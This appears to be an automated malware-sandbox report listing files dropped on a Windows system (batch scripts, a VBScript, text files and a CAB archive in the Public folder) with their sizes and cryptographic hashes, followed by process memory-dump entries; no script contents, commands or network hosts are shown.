f99c86a8f339da13671103e1f3e3f1fcd67252ca0061fb5a72f385adde87c6ceda33a65c29a4f42d02be50be5346a941ecb980a5ef1a5b46b5551b37b6103694

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
e49f9eaa05d86328780cfa76fc5dcf8a

SHA1
8b26cd356395c4431db9fa3e0228481245e41a51

SHA256
1c5d0f49f703b122463c0630f432ae7e8af1c8c65a06080208aacc8ad3534dec

SHA512
da57fc16dfbd74bee45d0a261137dfd1587fc2a0018bfe736312e7efeea96f4034493ad898d3e67cac54ff66108455018cc48dfaf26d99991df42b98be6903b3

Download Submit
C:\Users\Public\Documents\d1.txt

Filesize
2KB

MD5
ff7f2ed6e4d1bfc7eac233d369821b08

SHA1
ac4f92b8ffc57d72de3f51522d8ad32bb27e767f

SHA256
ad74caa83f820856ac2d3eeb19a6932dfb029143d71d421d9c7eec1f8df66ac2

SHA512
c20cbab89eef3e281e33aafd001e21ffebe0d461452710a79669853f80f0089465d6612919feb8551abfb634c823d3c8ae2046a151405a41a8569a7df769078f

Download Submit
C:\Users\Public\Documents\d2.txt

Filesize
1KB

MD5
2b14f80139b10023e6f75e839fa22a1e

SHA1
6b29abaa3d8f93b810859354a30757cb83891a66

SHA256
05bf9e31c818d0ba572d37304b8b9844e864cb54d2e15663f8f6eb40817c7f95

SHA512
b81b90e9126fe8a23eea0aecca21518d13b91961d68c801127458b5faf481f27bf53430d624d37baf83a559d7320ac0dd9f6b627932562708400cad73da6e9cd

Download Submit
C:\Users\Public\Documents\d3.txt

Filesize
1KB

MD5
1146e616ef12f1db1e33e968f91426c5

SHA1
26cbfdd392f837ba8add6fab41df7d483a1743ec

SHA256
2ebc72224f9843426b4ff1e4f5e385db2b86954ec36394e11bb0190a8bfdd403

SHA512
e83148bdb57f1bb14186dfe12762c3c5d96e053d8b922ab1cb79569050c177a16e7d197cb655360c1f098c6a088e6e392d3f2e40de66c76da0501428f08d440c

Download Submit
C:\Users\Public\Documents\d4.txt

Filesize
1KB

MD5
9b9072672874737902cd2df5cc7ee08b

SHA1
7b8533d75dc2a6cb2e9e0934551bec784242109c

SHA256
499a980c7484c6815835f0e0f587d2f865c69e66495889ba4ecfd063220f537b

SHA512
bc44e819b6150576af52b0009c3ef8741b6e3948a83a7893c51e3d6707e403a3b22235c1564ed83eddb3f07efaaaf7b1a8650474f19d751d2ea65fd1cd83716b

Download Submit
C:\Users\Public\documents\30440211.bat

Filesize
260B

MD5
1af7148dc027753297e0f28770f16d4e

SHA1
11848fd95253c06c9271bae52c420a1c44978297

SHA256
0889460d9f7b9a7aa8b3e63b71092ef42d1865c45e674193d0fc4ae763d46556

SHA512
f1a3aebeb8005483ab8f9cb3420a3a4147d65811e4a7103b990c6df1c246dc36ca01b7f77b36dc67616db85779b9f81eeb1a6ef4b2c78f9d56f81ecda4990b82

Download Submit
C:\Users\Public\documents\47835693.bat

Filesize
605B

MD5
c8c9fef7678d9d3e3dedef57b328c080

SHA1
f37756a95e65e39601c2a164981a450b40757ac8

SHA256
79b73c76f070e76adc5df5d2e4cdcce91bb545542635b533697526f7df2065f7

SHA512
54acbfeb30717f72b78cb0cd2ec0302090efcfdf63c339d7b99a1bbe0f296f559350aff32767e884138636a1ac012e51810fd6be82c7e860a4b9c21950d0b124

Download Submit
C:\Users\Public\documents\49120862.bat

Filesize
583B

MD5
23fbc0f35f33ec0abc100e0dd5e21033

SHA1
e303668e3a0891b60061331a25681082c61f55fb

SHA256
99a11e015e93efadcf1008a28b1a088ac203e0c932ddcfb2c05c7a65e014eb14

SHA512
5fca15d5e083768d5dde782a6d5f8f6db180fdc3d79dbd44e26140724e2fe5a625034e0209f16b9253950798ae1a851cd81bd4e62f52260293fef8f36fb1a940

Download Submit
C:\Users\Public\documents\60712945.bat

Filesize
2KB

MD5
3e16b90540bb6086c604d0353f5f9a7f

SHA1
8811f6ad1597e8fd99936060539e97b93bc35bb8

SHA256
e7d5ea5979de8492c1bc05b840427b5a720c49417133f7accb0f3e7061fdff79

SHA512
cd96baf1a3cf5d021cfbefa9b621700eae53fd209da086ef8be793c11e7cb2de78e4d9bd28642e51570334640451b6b324053353c5c9dfba17a235876b839a46

Download Submit
C:\Users\Public\documents\78345839.bat

Filesize
424B

MD5
d6f4d4a85d7b8b940bf6155806d6f930

SHA1
e3d1b7ae81998bf2fbe124d0881727841cf61b10

SHA256
4d50059b428c3055ce5133f2411877fb70b6bc80dd580549f480d2630a52d040

SHA512
cfe03a0d926a81ccb449c25b183151bbef6ba9cc8cdc44c140b8a1f72472d6e9450c89cb622344c136a2d7fdd1e192e855a34cbf1fb1b939fb409953ea636be4

Download Submit
C:\Users\Public\documents\99548182.bat

Filesize
2KB

MD5
d8047ac489bc55b1353904b986c53059

SHA1
9d223aef54395a83f98a64d249cc35fc7acacae7

SHA256
e97fe121554aa5a8287759a1e15d442460bd63c67126069933ee898bf3034fe5

SHA512
c4316c4fd4626b29ca59e039a5bdc89acf39fb90c1092c115719ea01eefd9bd8be2698ce2ff4707d9db6d22117b2712ee6d0c908e00b6ed454c5b65b6ae8331b

Download Submit
C:\Users\Public\documents\start.vbs

Filesize
326B

MD5
396a9b9d9e1a0489b91f9e1ac5dc6411

SHA1
04f4679ffd556f7d6405d75b12786e24ad59f1e0

SHA256
ccbaf2691ad37887a85cb283aaaa1c2028f3dc2df304cf5db71db92b09ebf411

SHA512
90ee7823ab42881e91eb67719fef96d6d04d0273db0149b3d03c47e7f4f16b3744fec6ef6cf20d5f4445c683a21530506fabb643a82a6da198a527f052f4ad7a

Download Submit
\??\c:\users\public\uhcybg.cab

Filesize
79KB

MD5
cc67ae1142a4317a083cd0a63bcc890c

SHA1
ddd6276655ff3058ee0f90b1338b85902a7af71c

SHA256
7bf4515931828d60c330426838c96585a7d4967108e8d88bf4219f54f3e2e403

SHA512
933675742594e9b8e44ea3fcdff48c39d852478025e63e6c29881b49012c593c3382443f86ff1aab62ec4f909082cd6d43462cbb023a0cfad1cc09e2e2baa58a

Download Submit
\??\c:\users\public\uhcybg.cab

Filesize
79KB

MD5
abe5b0bfc803314fae311c4a797afeea

SHA1
82d60273dacdee88add4f7391c5d5ac0a52c7b00

SHA256
83beecc887b0a90c75de2d91bf52fa7a51815027749a1131bcc48ca7aab4fe17

SHA512
b61d1cfe309098e4cd420adfafec14c7c20e7cac2beb5de8f822b0b302383e16f4f09515ed26f0611b41ad8112907421006ad8a254b8825204a311a3b0dd4810

Download Submit
memory/1104-146-0x000007FEF53F0000-0x000007FEF5D8D000-memory.dmp

Filesize
9.6MB

Download
memory/1104-149-0x00000000024C0000-0x0000000002540000-memory.dmp

Filesize
512KB

Download
memory/1104-179-0x000007FEF53F0000-0x000007FEF5D8D000-memory.dmp

Filesize
9.6MB

Download
memory/1104-151-0x00000000024C0000-0x0000000002540000-memory.dmp

Filesize
512KB

Download
memory/1104-150-0x00000000024C0000-0x0000000002540000-memory.dmp

Filesize
512KB

Download
memory/1104-147-0x00000000024C0000-0x0000000002540000-memory.dmp

Filesize
512KB

Download
memory/1104-175-0x00000000024C0000-0x0000000002540000-memory.dmp

Filesize
512KB

Download
memory/1104-148-0x000007FEF53F0000-0x000007FEF5D8D000-memory.dmp

Filesize
9.6MB

Download
memory/1260-129-0x00000000025E0000-0x0000000002660000-memory.dmp

Filesize
512KB

Download
memory/1260-131-0x000007FEF4AF0000-0x000007FEF548D000-memory.dmp

Filesize
9.6MB

Download
memory/1260-126-0x000007FEF4AF0000-0x000007FEF548D000-memory.dmp

Filesize
9.6MB

Download
memory/1260-124-0x0000000002470000-0x0000000002478000-memory.dmp

Filesize
32KB

Download
memory/1260-127-0x00000000025E0000-0x0000000002660000-memory.dmp

Filesize
512KB

Download
memory/1260-123-0x000007FEF4AF0000-0x000007FEF548D000-memory.dmp

Filesize
9.6MB

Download
memory/1260-125-0x00000000025E0000-0x0000000002660000-memory.dmp

Filesize
512KB

Download
memory/1260-130-0x00000000025E0000-0x0000000002660000-memory.dmp

Filesize
512KB

Download
memory/1260-122-0x000000001B240000-0x000000001B522000-memory.dmp

Filesize
2.9MB

Download
memory/1728-100-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp

Filesize
9.6MB

Download
memory/1728-102-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp

Filesize
9.6MB

Download
memory/1728-101-0x0000000002920000-0x00000000029A0000-memory.dmp

Filesize
512KB

Download
memory/1728-106-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp

Filesize
9.6MB

Download
memory/1728-105-0x0000000002920000-0x00000000029A0000-memory.dmp

Filesize
512KB

Download
memory/1728-104-0x0000000002920000-0x00000000029A0000-memory.dmp

Filesize
512KB

Download
memory/1728-103-0x0000000002920000-0x00000000029A0000-memory.dmp

Filesize
512KB

Download
memory/2024-157-0x000007FEF53F0000-0x000007FEF5D8D000-memory.dmp

Filesize
9.6MB

Download
memory/2024-166-0x000007FEF53F0000-0x000007FEF5D8D000-memory.dmp

Filesize
9.6MB

Download
memory/2024-165-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/2024-163-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/2024-162-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/2024-161-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/2024-160-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/2024-159-0x000007FEF53F0000-0x000007FEF5D8D000-memory.dmp

Filesize
9.6MB

Download
memory/2024-158-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/2232-178-0x0000000002710000-0x0000000002790000-memory.dmp

Filesize
512KB

Download
memory/2232-190-0x000007FEF53F0000-0x000007FEF5D8D000-memory.dmp

Filesize
9.6MB

Download
memory/2232-191-0x0000000002710000-0x0000000002790000-memory.dmp

Filesize
512KB

Download
memory/2232-180-0x0000000002710000-0x0000000002790000-memory.dmp

Filesize
512KB

Download
memory/2232-177-0x0000000002710000-0x0000000002790000-memory.dmp

Filesize
512KB

Download
memory/2232-176-0x0000000002710000-0x0000000002790000-memory.dmp

Filesize
512KB

Download
memory/2232-174-0x000007FEF53F0000-0x000007FEF5D8D000-memory.dmp

Filesize
9.6MB

Download
memory/2232-173-0x0000000002710000-0x0000000002790000-memory.dmp

Filesize
512KB

Download
memory/2232-172-0x000007FEF53F0000-0x000007FEF5D8D000-memory.dmp

Filesize
9.6MB

Download
memory/2484-54-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2484-114-0x0000000002840000-0x00000000028C0000-memory.dmp

Filesize
512KB

Download
memory/2484-115-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2484-59-0x0000000002840000-0x00000000028C0000-memory.dmp

Filesize
512KB

Download
memory/2484-58-0x0000000002840000-0x00000000028C0000-memory.dmp

Filesize
512KB

Download
memory/2484-57-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2484-55-0x0000000002840000-0x00000000028C0000-memory.dmp

Filesize
512KB

Download
memory/2816-44-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2816-43-0x0000000002360000-0x00000000023E0000-memory.dmp

Filesize
512KB

Download
memory/2816-91-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2816-40-0x000000001B210000-0x000000001B4F2000-memory.dmp

Filesize
2.9MB

Download
memory/2816-45-0x0000000002360000-0x00000000023E0000-memory.dmp

Filesize
512KB

Download
memory/2816-41-0x00000000025E0000-0x00000000025E8000-memory.dmp

Filesize
32KB

Download
memory/2816-47-0x0000000002360000-0x00000000023E0000-memory.dmp

Filesize
512KB

Download
memory/2816-46-0x0000000002360000-0x00000000023E0000-memory.dmp

Filesize
512KB

Download
memory/2816-42-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp

Filesize
9.6MB

Download
memory/3036-188-0x000007FEF53F0000-0x000007FEF5D8D000-memory.dmp

Filesize
9.6MB

Download
memory/3036-194-0x00000000027C0000-0x0000000002840000-memory.dmp

Filesize
512KB

Download
memory/3036-195-0x00000000027C0000-0x0000000002840000-memory.dmp

Filesize
512KB

Download
memory/3036-193-0x00000000027C0000-0x0000000002840000-memory.dmp

Filesize
512KB

Download
memory/3036-192-0x000007FEF53F0000-0x000007FEF5D8D000-memory.dmp

Filesize
9.6MB

Download
memory/3036-189-0x00000000027C0000-0x0000000002840000-memory.dmp

Filesize
512KB

Download